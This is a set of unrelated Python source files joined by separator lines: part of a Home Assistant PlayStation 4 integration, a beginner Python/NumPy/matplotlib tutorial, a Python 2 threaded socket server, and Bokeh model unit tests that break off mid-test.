                    DOMAIN,
                    unique_id,
                    suggested_object_id=new_id,
                    config_entry=entry,
                    device_id=e_entry.device_id,
                )
                entry.version = 3
                _LOGGER.info(
                    "PlayStation 4 identifier for entity: %s \
                    has changed",
                    entity_id,
                )
                config_entries.async_update_entry(entry)
                return True

    # Migration failed: tell the user to re-configure the integration.
    msg = f"""{reason[version]} for the PlayStation 4 Integration.
            Please remove the PS4 Integration and re-configure
            [here](/config/integrations)."""
    hass.components.persistent_notification.async_create(
        title="PlayStation 4 Integration Configuration Requires Update",
        message=msg,
        notification_id="config_entry_migration",
    )
    return False
def format_unique_id(creds, mac_address):
    """Use last 4 Chars of credential as suffix. Unique ID per PSN user."""
    return f"{mac_address}_{creds[-4:]}"
def load_games(hass: HomeAssistant, unique_id: str) -> dict:
    """Load games for sources."""
    g_file = hass.config.path(GAMES_FILE.format(unique_id))
    try:
        games = load_json(g_file)
    except HomeAssistantError as error:
        games = {}
        _LOGGER.error("Failed to load games file: %s", error)
    # load_json can return a non-dict on malformed content; fall back to {}.
    if not isinstance(games, dict):
        _LOGGER.error("Games file was not parsed correctly")
        games = {}
    # If file exists
    if os.path.isfile(g_file):
        games = _reformat_data(hass, games, unique_id)
    return games
def save_games(hass: HomeAssistant, games: dict, unique_id: str):
    """Save games to file."""
    g_file = hass.config.path(GAMES_FILE.format(unique_id))
    try:
        save_json(g_file, games)
    except OSError as error:
        # Best-effort persistence; the in-memory games dict stays valid.
        _LOGGER.error("Could not save game list, %s", error)
def _reformat_data(hass: HomeAssistant, games: dict, unique_id: str) -> dict:
    """Reformat data to correct format."""
    data_reformatted = False
    for game, data in games.items():
        # Convert str format to dict format.
        if not isinstance(data, dict):
            # Use existing title. Assign defaults.
            games[game] = {
                ATTR_LOCKED: False,
                ATTR_MEDIA_TITLE: data,
                ATTR_MEDIA_IMAGE_URL: None,
                ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_GAME,
            }
            data_reformatted = True
            _LOGGER.debug("Reformatting media data for item: %s, %s", game, data)
    # Persist only if something actually changed.
    if data_reformatted:
        save_games(hass, games, unique_id)
    return games
def service_handle(hass: HomeAssistant):
    """Handle for services."""

    async def async_service_command(call):
        """Service for sending commands."""
        entity_ids = call.data[ATTR_ENTITY_ID]
        command = call.data[ATTR_COMMAND]
        # Fan the command out to every registered device in the target list.
        for device in hass.data[PS4_DATA].devices:
            if device.entity_id in entity_ids:
                await device.async_send_command(command)

    hass.services.async_register(
        DOMAIN, SERVICE_COMMAND, async_service_command, schema=PS4_COMMAND_SCHEMA
    )
|
|
# NOTE: `from __future__ import ...` must be the very first statement of a
# module; the original placed it after the matplotlib import, which raises
# a SyntaxError at compile time.
from __future__ import print_function, division, absolute_import

# don't need to care about the first 3 lines (just some configuration for ipython notebook)
import matplotlib
matplotlib.use('Agg')

import os
import numpy as np
import matplotlib.pyplot as plt

help(os)  # prints the full `os` module documentation
## List
X = [1, 2, 3, 4]
print('Access list element:', X[0], X[1])
print('Slicing:', X[:2], X[1:3])
X[2:4] = [8, 9]  # Assign a new sublist to a slice

## Dictionary
X = {'a': 1, 'b': 2}
print('Access dictionary element:', X['a'], X['b'])
print('Keys:', X.keys())      # NOTE: a dict_keys view on Python 3
print('Values:', X.values())  # NOTE: a dict_values view on Python 3

## String
X = 'abcdxyz'
print('Access character:', X[0], X[1])
print(X.capitalize())  # Capitalize a string
print(X.upper())       # Convert a string to uppercase
print(X.rjust(7))      # Right-justify a string, padding with spaces
print(X.center(7))     # Center a string, padding with spaces
print(X.replace('abc', 'haha'))  # Replace a substring

### Boolean
X = True
if X and False:
    print('You wont see anything here.')
if X or False:
    print('Now you see it')
if True:
    print("Do Something")
elif False:
    print("Nothing")
else:
    print("Anything")
animals = ['cat', 'dog', 'monkey']
for animal in animals:
    print(animal)

# adding enumerate for indexing
animals = ['cat', 'dog', 'monkey']
for idx, animal in enumerate(animals):
    print('#%d: %s' % (idx + 1, animal))

# Full version
nums = [0, 1, 2, 3, 4]
squares = []
for x in nums:
    squares.append(x ** 2)
print(squares)

# Short version
nums = [0, 1, 2, 3, 4]
squares = [x ** 2 for x in nums]
print(squares)

# Short and fun version: conditional expression plus a filter —
# 3 is skipped, evens are squared, the remaining odds are cubed.
nums = [0, 1, 2, 3, 4]
squares = [x**2 if x % 2 == 0
           else x**3
           for x in nums
           if x != 3]
print(squares)
d = {'person': 2, 'cat': 4, 'spider': 8}
# Python 3: dict.iteritems/iterkeys/itervalues were removed. items(),
# keys() and values() now return lazy views, so there is no speed reason
# to avoid them (the old "iteritems is faster" advice was Python-2-only).
for animal, numb in d.items():
    print('A %s has %d legs' % (animal, numb))
for k in d:  # iterating a dict yields its keys
    print(k)
for v in d.values():
    print(v)

# Dictionary comprehension
nums = [0, 1, 2, 3, 4]
even_num_to_square = {x: x ** 2 for x in nums if x % 2 == 0}
print(even_num_to_square)  # Prints "{0: 0, 2: 4, 4: 16}"
def sign(x):
    """Classify a number as 'positive', 'negative', or 'zero'."""
    if x > 0:
        return 'positive'
    if x < 0:
        return 'negative'
    return 'zero'


for value in [-1, 0, 1]:
    print(sign(value))
def multi_purpose(x, y=1):
    """Return the tuple (x*y, x/y, x+y, x-y) — multiple return values demo."""
    product, quotient = x * y, x / y
    total, difference = x + y, x - y
    return product, quotient, total, difference


a, b, c, d = multi_purpose(8)
print(a, b, c, d)
x = multi_purpose(8, y=12)
print(x)
def nestle():
    """Nested-function demo: returns the inner function `abc` itself."""
    def abc():
        print('abc')
    return abc


nestle()()  # calling the returned function prints 'abc'

# NOTE(review): the comprehension uses x**2 (not i**2), so f(n) is the list
# [n**2] repeated n times — presumably intentional for this demo; confirm.
f = lambda x: [x**2 for i in range(x)]
print(f(10))
class Greeter(object):
    """Toy class: stores a name and prints a greeting for it."""

    def __init__(self, name):
        """Remember the name to greet."""
        self.name = name

    def greet(self, loud=False):
        """Print a greeting; shout it when loud is True."""
        if loud:
            greeting = 'HELLO, %s!' % self.name.upper()
        else:
            greeting = 'Hello, %s' % self.name
        print(greeting)
g = Greeter('Fred')  # Construct an instance of the Greeter class
g.greet()  # Call an instance method (prints "Hello, Fred")
g.greet(loud=True)  # Call an instance method (prints "HELLO, FRED!")
# Build a 4x3 float32 matrix to demonstrate basic NumPy operations.
X = np.array([[1, 2, 3],
              [4, 5, 6],
              [7, 8, 9],
              [10, 11, 12]], dtype='float32')
print('Basic info:', X.shape, X.dtype)
# Array indexing
print(X[0])        # first row, all columns
print(X[:, :2])    # every row, first two columns
print(X[:, -2:])   # every row, last two columns
# Transpose the matrix
print(X.T)
# Fast random sampling: index with a random permutation
# (np.random.shuffle is very slow for big data)
perm = np.random.permutation(X.shape[0])
X = X[perm][:3]    # keep the first 3 shuffled rows
a = np.zeros((2, 2))          # 2x2 array of zeros
print(a)
b = np.ones((1, 2))           # 1x2 array of ones
print(b)
c = np.full((2, 2), 7)        # constant array filled with 7
print(c)
d = np.eye(2)                 # 2x2 identity matrix
print(d)
e = np.random.random((2, 2))  # uniform random values in [0, 1)
print(e)
# Two 2x2 operand matrices plus a 2x3 example array.
x = np.array([[1, 2],
              [3, 4]], dtype=np.float64)
y = np.array([[5, 6],
              [7, 8]], dtype=np.float64)
z = np.array([[1, 2, 3],
              [4, 5, 6]], dtype=np.float64)
# Matrix (dot) product
print(x.dot(y))
# Elementwise sum, two equivalent spellings
print(x + y)
print(np.add(x, y))
# Elementwise difference, two equivalent spellings
print(x - y)
print(np.subtract(x, y))
# Elementwise product, two equivalent spellings
print(x * y)
print(np.multiply(x, y))
# Elementwise division, two equivalent spellings
print(x / y)
print(np.divide(x, y))
# Elementwise square root
print(np.sqrt(x))
print(np.sum(x))          # sum of every element
print(np.sum(x, axis=0))  # sum of each column
print(np.sum(x, axis=1))  # sum of each row
# Add vector v to every row of matrix x, storing the result in y.
x = np.array([[1, 2, 3],
              [4, 5, 6],
              [7, 8, 9],
              [10, 11, 12]])
v = np.array([1, 0, 1])
y = np.empty_like(x)  # uninitialized matrix with x's shape and dtype
# Version 1: explicit Python loop over the rows.
for row in range(4):
    y[row, :] = x[row, :] + v
print(y)
# Version 2: broadcasting does the same thing in one vectorized expression.
x = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]])
v = np.array([1, 0, 1])
y = x + v
print(y)
# Fix: in the original, plt.figure()/plt.plot()/plt.show() were called
# BEFORE the `import matplotlib.pyplot as plt` line, raising NameError at
# runtime. Import before first use.
import numpy as np
import matplotlib.pyplot as plt
# Compute the x and y coordinates for points on a sine curve
x = np.arange(0, 3 * np.pi, 0.1)
y = np.sin(x)
# Plot the points using matplotlib
plt.figure()
plt.plot(x, y)
plt.show()  # You must call plt.show() to make graphics appear.
# Compute the x and y coordinates for points on sine and cosine curves
x = np.arange(0, 3 * np.pi, 0.1)
y_sin = np.sin(x)
y_cos = np.cos(x)
# Plot both curves on one axes, with labels, title and legend
plt.plot(x, y_sin)
plt.plot(x, y_cos)
plt.xlabel('x axis label')
plt.ylabel('y axis label')
plt.title('Sine and Cosine')
plt.legend(['Sine', 'Cosine'])
plt.show()
# Compute the x and y coordinates for points on sine and cosine curves
x = np.arange(0, 3 * np.pi, 0.1)
y_sin = np.sin(x)
y_cos = np.cos(x)
# Set up a subplot grid that has height 2 and width 1,
# and set the first such subplot as active.
plt.subplot(2, 1, 1)
plt.plot(x, y_sin)
plt.title('Sine')
# Set the second subplot as active, and make the second plot.
plt.subplot(2, 1, 2)
plt.plot(x, y_cos)
plt.title('Cosine')
# Show the figure.
plt.show()
|
|
"""
This module handles the connections of the server.
Attributes:
receiver_running (bool): Flag to kill the receiver thread
"""
import socket
import threading
import logging
import select
import cStringIO as StringIO
import protocol
import protocol.thread
from utils import handle_except
receiver_running = True
class NetworkReceiverThread(threading.Thread):
    """
    This thread handles receiving data from the clients.

    NOTE(review): this is Python 2 code — cStringIO buffers and
    generator ``.next()`` are used; a Python 3 port would need
    io.BytesIO, ``next(...)`` and bytes-vs-str fixes.

    Attributes:
        logger (logging.Logger): The logger of the thread.
        logic_queue (Queue.Queue): The queue of the logic thread.
        messages (dict): Dict of messages that weren't fully received yet.
        network_queue (Queue.Queue): The queue of the thread.
        port (int): The connection port.
        server (socket.socket): The main socket of the server.
        sockets (dict): The sockets of the clients, keyed by client ip.
    """
    def __init__(self,
                 network_queue,
                 logic_queue,
                 port):
        """
        Initialize the receiver thread.
        Args:
            network_queue (Queue.Queue): The queue of the thread.
            logic_queue (Queue.Queue): The queue of the logic thread.
            port (int): The connection port.
        """
        # Name the thread after the concrete class for readable logs.
        current_class = self.__class__
        thread_name = current_class.__name__
        super(current_class, self).__init__(name=thread_name)
        self.logger = logging.getLogger('network')
        self.network_queue = network_queue
        self.logic_queue = logic_queue
        self.port = port
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sockets = {}
        # dict to store incomplete messages
        # keys are sockets, values are pairs of:
        # (received data buffer, number of missing bytes (int))
        self.messages = {}
    def receive(self, sock, bytes):
        """
        Receive a number of bytes from a socket.
        If the socket fails (or the peer closed the connection), the
        socket is removed from the socket list and '' is returned.
        Args:
            sock (socket.socket): The socket to receive bytes from.
            bytes (int): The number of bytes to receive.
        Returns:
            str: The received string ('' on failure / closed connection).
        """
        try:
            received = sock.recv(bytes)
        except:
            # Any socket error is treated exactly like an orderly close.
            received = ''
        # if connection is closed, remove it
        if received == '':
            # inverse lookup of the ip matching the socket in self.sockets
            # NOTE(review): generator.next() is Python 2 only and raises
            # StopIteration if the socket is not in self.sockets.
            ip = (key for key, value in self.sockets.items()
                  if value == sock).next()
            self.logger.debug('client %s disconnected' % ip)
            # announce the disconnected socket to both threads, then drop it
            message = protocol.thread.disconnected(
                client=ip)
            self.logic_queue.put(message)
            self.network_queue.put(message)
            del self.sockets[ip]
        return received
    @handle_except('network')
    def run(self):
        """Execute the network receiver thread."""
        self.logger.info('NetworkReceiverThread thread started')
        global receiver_running
        self.server.bind(('', self.port))
        self.server.listen(5)
        while receiver_running:
            # test which socket sent data; the 0.2s timeout keeps the loop
            # responsive to the receiver_running shutdown flag
            all_sockets = self.sockets.values() + [self.server]
            recv_from_sockets, _, _ = select.select(all_sockets, [], [], 0.2)
            for s in recv_from_sockets:
                # if new client trying to connect, accept it
                if s is self.server:
                    new_socket, address = s.accept()
                    ip = new_socket.getpeername()[0]
                    self.sockets[ip] = new_socket
                    # hand the new socket to the sender thread as well
                    message = protocol.thread.new_socket(
                        socket=new_socket)
                    self.network_queue.put(message)
                    self.logger.debug('new connection to client %s' % ip)
                # if a connected client send a message, receive it
                else:
                    # if this is a part of a message that already begun to
                    # arrive, append it to the pending entry
                    if s in self.messages:
                        buff, missing_bytes = self.messages[s]
                        received = self.receive(s, missing_bytes)
                        buff.write(received)
                        missing_bytes -= len(received)
                        self.messages[s] = buff, missing_bytes
                        # if no bytes are missing, the message is received
                        # pass it to the logic thread, and remove from queue
                        if missing_bytes == 0:
                            content = buff.getvalue()
                            buff.close()
                            message = protocol.thread.received(
                                message=content, client=s.getpeername()[0])
                            self.logic_queue.put(message)
                            del self.messages[s]
                            self.logger.debug(
                                'received a message from %s: %s...'
                                % (s.getpeername()[0], repr(content[:5])))
                        else:
                            self.logger.debug('received part of message. ' +
                                              'total bytes: %s, left %s.' %
                                              (len(received), missing_bytes))
                    # if this is the first part of a message, read the
                    # 4-byte size header and register a pending entry
                    else:
                        size_str = self.receive(s, 4)
                        # if connection is closed, remove it
                        if size_str != '':
                            size = protocol.get_size(size_str)
                            self.messages[s] = (StringIO.StringIO(), size)
                            self.logger.debug('new message of size %s' % size)
        self.server.close()
        self.logger.info('NetworkReceiverThread thread ended')
class NetworkSenderThread(threading.Thread):
    """
    This thread handles sending data to the clients.
    Attributes:
        logger (logging.Logger): The logger of the thread.
        logic_queue (Queue.Queue): The queue of the logic thread.
        network_queue (Queue.Queue): The queue of the thread.
        running (bool): The flag of the main loop.
        sockets (dict): Dict of the connections, keyed by client ip.
    """
    def __init__(self,
                 network_queue,
                 logic_queue,
                 port):
        """
        Initialize the sender thread.
        Args:
            network_queue (Queue.Queue): The queue of the thread.
            logic_queue (Queue.Queue): The queue of the logic thread.
            port (int): The connection port (unused here; kept for
                signature parity with NetworkReceiverThread).
        """
        current_class = self.__class__
        thread_name = current_class.__name__
        super(current_class, self).__init__(name=thread_name)
        self.logger = logging.getLogger('network')
        self.network_queue = network_queue
        self.logic_queue = logic_queue
        self.sockets = {}
        self.running = True
    @handle_except('network')
    def send(self, sock, message):
        """
        Send a message to a client.
        If the send fails, the client is removed from the client list.
        Args:
            sock (socket.socket): The client socket.
            message (str): The message.
        """
        try:
            sock.send(message)
        except Exception:
            # The peer is gone. getpeername() can itself fail on a broken
            # socket, so find the ip by reverse lookup instead (same
            # approach as NetworkReceiverThread.receive).
            for ip in [key for key, value in self.sockets.items()
                       if value is sock]:
                thread_message = protocol.thread.disconnected(
                    client=ip)
                self.logic_queue.put(thread_message)
                del self.sockets[ip]
    @handle_except('network')
    def run(self):
        """Execute the network sender thread."""
        self.logger.info('NetworkThread thread started')
        global receiver_running
        while self.running:
            # get a message from the queue (blocks until one arrives)
            message = self.network_queue.get()
            message_type = message['type']
            # send a message to the clients
            if message_type == 'send':
                client = message['client']
                net_message = message['message']
                if client == '*':
                    # Broadcast. Iterate over a SNAPSHOT of the keys:
                    # self.send() may delete a dead client, and mutating
                    # the dict while iterating it raises RuntimeError.
                    for ip in list(self.sockets):
                        if ip in self.sockets:
                            self.send(self.sockets[ip], net_message)
                elif client in self.sockets:
                    self.send(self.sockets[client], net_message)
                else:
                    self.logger.warning(
                        'there is no client %s, can\'t send message' % client)
            # add new socket to the list
            elif message_type == 'new_socket':
                s = message['socket']
                ip = s.getpeername()[0]
                self.sockets[ip] = s
                message = protocol.thread.connected(ip=ip)
                self.logic_queue.put(message)
            # remove a socket from the list
            elif message_type == 'disconnected':
                ip = message['client']
                # pop() tolerates a client that was already dropped by a
                # failed send(); the original unconditional del could
                # raise KeyError here.
                sock = self.sockets.pop(ip, None)
                if sock is not None:
                    try:
                        sock.close()
                    except Exception:
                        pass
            # thread exit
            elif message_type == 'exit':
                self.running = False
                # also stop the receiver thread's main loop
                receiver_running = False
                for s in self.sockets.values():
                    s.close()
        self.logger.info('NetworkThread thread ended')
|
|
from __future__ import absolute_import
import copy
import pytest
from six.moves import xrange
from bokeh.core.properties import List, String, Instance, Dict, Any, Int
from bokeh.model import Model
from bokeh.core.property.wrappers import PropertyValueList, PropertyValueDict
from bokeh.util.future import with_metaclass
def large_plot(n):
    """Build a Column layout holding ``n`` small line plots.

    Returns a ``(root, objects)`` pair where ``objects`` is the set of
    every model expected to be reachable from ``root`` via references().
    """
    from bokeh.models import (
        Plot, LinearAxis, Grid, GlyphRenderer,
        ColumnDataSource, DataRange1d, PanTool, ZoomInTool, ZoomOutTool,
        WheelZoomTool, BoxZoomTool, BoxSelectTool, SaveTool, ResetTool
    )
    from bokeh.models.layouts import Column
    from bokeh.models.glyphs import Line
    root = Column()
    objects = {root}
    for index in xrange(n):
        source = ColumnDataSource(data=dict(x=[0, index + 1], y=[0, index + 1]))
        x_range = DataRange1d()
        y_range = DataRange1d()
        plot = Plot(x_range=x_range, y_range=y_range)
        xaxis = LinearAxis(plot=plot)
        yaxis = LinearAxis(plot=plot)
        xgrid = Grid(plot=plot, dimension=0)
        ygrid = Grid(plot=plot, dimension=1)
        tickers = [xaxis.ticker, xaxis.formatter, yaxis.ticker, yaxis.formatter]
        glyph = Line(x='x', y='y')
        renderer = GlyphRenderer(data_source=source, glyph=glyph)
        plot.renderers.append(renderer)
        # The overlay-bearing tools are kept in named variables because
        # their overlays must be part of the expected object set too.
        box_zoom = BoxZoomTool()
        box_select = BoxSelectTool()
        tools = [PanTool(), ZoomInTool(), ZoomOutTool(), WheelZoomTool(),
                 box_zoom, box_select, SaveTool(), ResetTool()]
        plot.add_tools(*tools)
        root.children.append(plot)
        objects.update(
            [x_range, y_range,
             xaxis, yaxis,
             xgrid, ygrid,
             renderer, renderer.view, glyph,
             source, source.selected, source.selection_policy,
             plot, plot.x_scale, plot.y_scale, plot.toolbar, plot.title,
             box_zoom.overlay, box_select.overlay]
            + tickers + tools)
    return root, objects
class TestMetaModel(object):
    """Tests for the MetaModel metaclass and its global class registry."""
    def setup_method(self):
        # Snapshot the global registry so teardown_method can restore it.
        from bokeh.model import MetaModel
        self.metamodel = MetaModel
        self.old_map = copy.copy(self.metamodel.model_class_reverse_map)
    def teardown_method(self):
        self.metamodel.model_class_reverse_map = self.old_map
    def mkclass(self):
        # Define (and thereby register) a fresh model class.
        class Test_Class(with_metaclass(self.metamodel)):
            foo = 1
        return Test_Class
    def test_metaclassing(self):
        tclass = self.mkclass()
        assert hasattr(tclass, '__view_model__')
        # registering the same class name twice must raise a Warning
        with pytest.raises(Warning):
            self.mkclass()
    def test_get_class(self):
        from bokeh.model import get_class
        self.mkclass()
        tclass = get_class('Test_Class')
        assert hasattr(tclass, 'foo')
        with pytest.raises(KeyError):
            get_class('Imaginary_Class')
class DeepModel(Model):
    # Model with one optional child; used to build deep reference chains.
    child = Instance(Model)
class TestCollectModels(object):
    """Tests that Model.references() collects every reachable model."""
    def test_references_large(self):
        # Every model created by large_plot must be reported by the root.
        root, objects = large_plot(10)
        assert set(root.references()) == objects
    def test_references_deep(self):
        root = DeepModel()
        objects = set([root])
        parent = root
        # in a previous implementation, about 400 would blow max
        # recursion depth, so we double that and a little bit,
        # here.
        for i in xrange(900):
            model = DeepModel()
            objects.add(model)
            parent.child = model
            parent = model
        assert set(root.references()) == objects
class SomeModelToJson(Model):
    # Minimal model with one reference and two plain properties;
    # used by TestModel.test_to_json below.
    child = Instance(Model)
    foo = Int()
    bar = String()
class TestModel(object):
    """Tests of basic Model behavior: properties, refs, JSON serialization."""
    def setup_method(self):
        from bokeh.models import Model
        self.pObjectClass = Model
        self.maxDiff = None
    def test_init(self):
        testObject = self.pObjectClass(id='test_id')
        assert testObject._id == 'test_id'
        testObject2 = self.pObjectClass()
        assert testObject2._id is not None
        assert set(["name", "tags", "js_property_callbacks", "subscribed_events", "js_event_callbacks"]) == testObject.properties()
        assert dict(
            name=None, tags=[], js_property_callbacks={}, js_event_callbacks={}, subscribed_events=[]
        ) == testObject.properties_with_values(include_defaults=True)
        assert dict() == testObject.properties_with_values(include_defaults=False)
    def test_ref(self):
        testObject = self.pObjectClass(id='test_id')
        assert {'type': 'Model', 'id': 'test_id'} == testObject.ref
    def test_references_by_ref_by_value(self):
        from bokeh.core.has_props import HasProps
        from bokeh.core.properties import Instance, Int
        class T(self.pObjectClass):
            t = Int(0)
        class Y(self.pObjectClass):
            t1 = Instance(T)
        class Z1(HasProps):
            t2 = Instance(T)
        class Z2(self.pObjectClass):
            t2 = Instance(T)
        class X1(self.pObjectClass):
            y = Instance(Y)
            z1 = Instance(Z1)
        class X2(self.pObjectClass):
            y = Instance(Y)
            z2 = Instance(Z2)
        t1, t2 = T(t=1), T(t=2)
        y = Y(t1=t1)
        z1, z2 = Z1(t2=t2), Z2(t2=t2)
        x1 = X1(y=y, z1=z1)
        x2 = X2(y=y, z2=z2)
        # Z1 is a plain HasProps (not a Model) so it is not itself a
        # reference, while Z2 is.
        assert x1.references() == {t1, y, t2, x1}
        assert x2.references() == {t1, y, t2, z2, x2}
    def test_references_in_containers(self):
        from bokeh.core.properties import Int, String, Instance, List, Tuple, Dict
        # XXX: can't use Y, because of:
        #
        # Warning: Duplicate __view_model__ declaration of 'Y' for class Y.
        # Previous definition: <class 'bokeh.tests.test_objects.Y'>
        class U(self.pObjectClass):
            a = Int
        class V(self.pObjectClass):
            u1 = Instance(U)
            u2 = List(Instance(U))
            u3 = Tuple(Int, Instance(U))
            u4 = Dict(String, Instance(U))
            u5 = Dict(String, List(Instance(U)))
        u1, u2, u3, u4, u5 = U(a=1), U(a=2), U(a=3), U(a=4), U(a=5)
        v = V(u1=u1, u2=[u2], u3=(3, u3), u4={"4": u4}, u5={"5": [u5]})
        assert v.references() == set([v, u1, u2, u3, u4, u5])
    def test_to_json(self):
        child_obj = SomeModelToJson(foo=57, bar="hello")
        obj = SomeModelToJson(child=child_obj,
                              foo=42, bar="world")
        json = obj.to_json(include_defaults=True)
        json_string = obj.to_json_string(include_defaults=True)
        assert { "child" : { "id" : child_obj._id, "type" : "SomeModelToJson" },
                 "id" : obj._id,
                 "name" : None,
                 "tags" : [],
                 'js_property_callbacks': {},
                 "js_event_callbacks" : {},
                 "subscribed_events" : [],
                 "foo" : 42,
                 "bar" : "world" } == json
        assert ('{"bar":"world",' +
                '"child":{"id":"%s","type":"SomeModelToJson"},' +
                '"foo":42,"id":"%s","js_event_callbacks":{},"js_property_callbacks":{},' +
                '"name":null,"subscribed_events":[],"tags":[]}') % (child_obj._id, obj._id) == json_string
    def test_no_units_in_json(self):
        from bokeh.models import AnnularWedge
        obj = AnnularWedge()
        json = obj.to_json(include_defaults=True)
        assert 'start_angle' in json
        assert 'start_angle_units' not in json
        assert 'outer_radius' in json
        assert 'outer_radius_units' not in json
    def test_dataspec_field_in_json(self):
        from bokeh.models import AnnularWedge
        obj = AnnularWedge()
        obj.start_angle = "fieldname"
        json = obj.to_json(include_defaults=True)
        assert 'start_angle' in json
        assert 'start_angle_units' not in json
        assert dict(units='rad', field='fieldname') == json['start_angle']
    def test_dataspec_value_in_json(self):
        from bokeh.models import AnnularWedge
        obj = AnnularWedge()
        obj.start_angle = 60
        json = obj.to_json(include_defaults=True)
        assert 'start_angle' in json
        assert 'start_angle_units' not in json
        assert dict(units='rad', value=60) == json['start_angle']
    def test_list_default(self):
        class HasListDefault(Model):
            value = List(String, default=["hello"])
        obj = HasListDefault()
        # Compare against the actual default value. The original asserted
        # obj.value == obj.value, which is vacuously true; this now matches
        # the style of test_dict_default below.
        assert obj.value == ["hello"]
        # 'value' should not be included because we haven't modified it
        assert 'value' not in obj.properties_with_values(include_defaults=False)
        # (but should be in include_defaults=True)
        assert 'value' in obj.properties_with_values(include_defaults=True)
        obj.value.append("world")
        # 'value' should now be included
        assert 'value' in obj.properties_with_values(include_defaults=False)
    def test_dict_default(self):
        class HasDictDefault(Model):
            value = Dict(String, Int, default=dict(hello=42))
        obj = HasDictDefault()
        assert obj.value == obj.value
        assert dict(hello=42) == obj.value
        # 'value' should not be included because we haven't modified it
        assert 'value' not in obj.properties_with_values(include_defaults=False)
        # (but should be in include_defaults=True)
        assert 'value' in obj.properties_with_values(include_defaults=True)
        obj.value['world'] = 57
        # 'value' should now be included
        assert 'value' in obj.properties_with_values(include_defaults=False)
        assert dict(hello=42, world=57) == obj.value
    def test_func_default_with_counter(self):
        counter = dict(value=0)
        def next_value():
            counter['value'] += 1
            return counter['value']
        class HasFuncDefaultInt(Model):
            value = Int(default=next_value)
        obj1 = HasFuncDefaultInt()
        obj2 = HasFuncDefaultInt()
        assert obj1.value+1 == obj2.value
        # 'value' is a default, but it gets included as a
        # non-default because it's unstable.
        assert 'value' in obj1.properties_with_values(include_defaults=False)
    def test_func_default_with_model(self):
        class HasFuncDefaultModel(Model):
            child = Instance(Model, lambda: Model())
        obj1 = HasFuncDefaultModel()
        obj2 = HasFuncDefaultModel()
        assert obj1.child._id != obj2.child._id
        # 'child' is a default, but it gets included as a
        # non-default because it's unstable.
        assert 'child' in obj1.properties_with_values(include_defaults=False)
class TestContainerMutation(object):
    """Shared helper for testing change events on container properties."""
    def _check_mutation(self, obj, attr, mutator, expected_event_old, expected_event_new):
        """Apply ``mutator`` to ``obj.attr`` and verify exactly one change
        event fired with the expected old and new values."""
        result = dict(calls=[])
        def record_trigger(attr, old, new_):
            result['calls'].append((attr, old, new_))
        obj.on_change(attr, record_trigger)
        try:
            actual_old = getattr(obj, attr)
            assert expected_event_old == actual_old
            mutator(actual_old)
            assert expected_event_new == getattr(obj, attr)
        finally:
            # Always detach the listener so later tests are unaffected.
            obj.remove_on_change(attr, record_trigger)
        assert 1 == len(result['calls'])
        call = result['calls'][0]
        assert attr == call[0]
        assert expected_event_old == call[1]
        assert expected_event_new == call[2]
class HasListProp(Model):
    # Model with a single List property; used by TestListMutation.
    foo = List(String)
    def __init__(self, **kwargs):
        super(HasListProp, self).__init__(**kwargs)
class TestListMutation(TestContainerMutation):
    """Change events fired by mutating a List property in place."""
    def test_whether_included_in_props_with_values(self):
        obj = HasListProp()
        assert 'foo' not in obj.properties_with_values(include_defaults=False)
        assert 'foo' in obj.properties_with_values(include_defaults=True)
        # simply reading the property creates a new wrapper, so be
        # sure that doesn't count as replacing the default
        foo = obj.foo
        assert foo == foo # this is to calm down flake's unused var warning
        assert 'foo' not in obj.properties_with_values(include_defaults=False)
        assert 'foo' in obj.properties_with_values(include_defaults=True)
        # but changing the list should count as replacing the default
        obj.foo.append("hello")
        assert 'foo' in obj.properties_with_values(include_defaults=False)
        assert 'foo' in obj.properties_with_values(include_defaults=True)
    def test_assignment_maintains_owners(self):
        # Re-assigning the property must move ownership to the new wrapper.
        obj = HasListProp()
        old_list = obj.foo
        assert isinstance(old_list, PropertyValueList)
        assert 1 == len(old_list._owners)
        obj.foo = ["a"]
        new_list = obj.foo
        assert isinstance(new_list, PropertyValueList)
        assert old_list is not new_list
        assert 0 == len(old_list._owners)
        assert 1 == len(new_list._owners)
    def test_list_delitem(self):
        obj = HasListProp(foo=["a", "b", "c"])
        assert isinstance(obj.foo, PropertyValueList)
        def mutate(x):
            del x[1]
        self._check_mutation(obj, 'foo', mutate,
                             ["a", "b", "c"],
                             ["a", "c"])
    def test_list_delslice(self):
        obj = HasListProp(foo=["a", "b", "c", "d"])
        assert isinstance(obj.foo, PropertyValueList)
        def mutate(x):
            del x[1:3]
        self._check_mutation(obj, 'foo', mutate,
                             ["a", "b", "c", "d"],
                             ["a", "d"])
    def test_list_iadd(self):
        obj = HasListProp(foo=["a"])
        assert isinstance(obj.foo, PropertyValueList)
        def mutate(x):
            x += ["b"]
        self._check_mutation(obj, 'foo', mutate,
                             ["a"],
                             ["a", "b"])
    def test_list_imul(self):
        obj = HasListProp(foo=["a"])
        assert isinstance(obj.foo, PropertyValueList)
        def mutate(x):
            x *= 3
        self._check_mutation(obj, 'foo', mutate,
                             ["a"],
                             ["a", "a", "a"])
    def test_list_setitem(self):
        obj = HasListProp(foo=["a"])
        assert isinstance(obj.foo, PropertyValueList)
        def mutate(x):
            x[0] = "b"
        self._check_mutation(obj, 'foo', mutate,
                             ["a"],
                             ["b"])
    def test_list_setslice(self):
        obj = HasListProp(foo=["a", "b", "c", "d"])
        assert isinstance(obj.foo, PropertyValueList)
        def mutate(x):
            x[1:3] = ["x"]
        self._check_mutation(obj, 'foo', mutate,
                             ["a", "b", "c", "d"],
                             ["a", "x", "d"])
    def test_list_append(self):
        obj = HasListProp()
        assert isinstance(obj.foo, PropertyValueList)
        self._check_mutation(obj, 'foo', lambda x: x.append("bar"), [], ["bar"])
    def test_list_extend(self):
        obj = HasListProp()
        assert isinstance(obj.foo, PropertyValueList)
        self._check_mutation(obj, 'foo', lambda x: x.extend(["x", "y"]), [], ["x", "y"])
    def test_list_insert(self):
        obj = HasListProp(foo=["a", "b"])
        assert isinstance(obj.foo, PropertyValueList)
        self._check_mutation(obj, 'foo', lambda x: x.insert(1, "x"),
                             ["a", "b"],
                             ["a", "x", "b"])
    def test_list_pop(self):
        obj = HasListProp(foo=["a", "b"])
        assert isinstance(obj.foo, PropertyValueList)
        self._check_mutation(obj, 'foo', lambda x: x.pop(),
                             ["a", "b"],
                             ["a"])
    def test_list_remove(self):
        obj = HasListProp(foo=["a", "b"])
        assert isinstance(obj.foo, PropertyValueList)
        self._check_mutation(obj, 'foo', lambda x: x.remove("b"),
                             ["a", "b"],
                             ["a"])
    def test_list_reverse(self):
